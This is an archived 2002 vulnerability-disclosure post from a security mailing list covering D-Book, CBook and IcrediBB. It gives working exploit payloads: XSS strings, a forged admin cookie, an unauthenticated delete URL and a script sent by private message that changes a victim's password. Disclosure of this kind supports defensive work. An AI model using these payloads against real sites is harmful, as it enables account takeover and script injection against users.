Security holes : D-Book, CBook, IcrediBB
From: frog frog (leseulfrog@hotmail.com)Date: 04/12/02
- Previous message: incubus: "RE: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 12 Apr 2002 12:09:53 -0000 From: frog frog <leseulfrog@hotmail.com> To: vuln-dev@securityfocus.com('binary' encoding is not supported, stored as-is)
Product 1 :
D-Book
http://www.smartbb.net
Versions :
1.4 (and less ?)
Problems :
- XSS
- Admin access
Exploits :
- [img=javascript:alert(%27hum%27)]
- Cookie "logged,anyvalue" on admin.php
More details in french :
http://www.ifrance.com/kitetoua/tuto/D-Book.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%
2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FD-
Book.txt&langpair=fr%7Cen&hl=fr&prev=%
2Flanguage_tools
****************************************
Product 2 :
CBook
Versions :
1.0.1 beta
Problems :
- XSS
- Access to an admin function (delete all entries)
Exploits :
- <script>ANYSCRIPT</script> on profil
- http://www.site.com/index.php?Change=2
More details in french :
http://www.ifrance.com/kitetoua/tuto/Cbook.txt
translated by google :
http://translate.google.com/translate?u=http%3A%
2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%
2FCbook.txt&langpair=fr%7Cen&hl=fr&prev=%
2Flanguage_tools
***********************************************
Product 3:
IcrediBB Bulletin Board System
http://www.icredibb.com
Versions :
1.1 beta
Problems :
- Access to users/admins account
- XSS
Exploits :
- To change password, in a private message :
<sc*ript>
window.open('usercp.php?
function=changepass&newpassword=PASS&passve
rify=PASS&submitnewpass=Submit');
window.open('usercp.php?
function=changepass&newpassword=PASS&passve
rify=PASS&submitnewpass=Submit');
window.open('usercp.php?
function=changepass&newpassword=PASS&passve
rify=PASS&submitnewpass=Submit');
window.open('index.php?function=logout');
window.open('usercp.php?
function=changepass&newpassword=PASS&passve
rify=PASS&submitnewpass=Submit');
</s*cript>
(without '*')
- In subject (private message) :
<script>ANYSCRIPT</script>
- In webbrowser :
/pm.php?
function=sendpm&to=VICTIM&subject=SUBJECT&im
ages=
javascript:alert('hello')
&message=MESSAGE&submitpm=Submit PM
/pm.php?
function=sendpm&to=VICTIM&subject=SUBJECT&im
ages=
javascript:window.open('http:%2F%2Fwww.url.com')
&message=MESSAGE&submitpm=Submit PM
/pm.php?
function=sendpm&to=VICTIM&subject=SUBJECT&im
ages=
javascript:a='http:%2F%2Fwww.url.com'%
3Bwindow.open(a)%
3B&message=MESSAGE&submitpm=Submit PM
- In /usercp.php?function=avataroptions :
javascript:alert(%27HeLLo%27)
More details in french :
http://www.ifrance.com/kitetoua/tuto/icrediBB.txt
translated by google :
http://translate.google.com/translate?u=http%3A%
2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%
2FicrediBB.txt&langpair=fr%7Cen&hl=fr&prev=%
2Flanguage_tools
**************************************************
frog-m@n
- Previous message: incubus: "RE: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
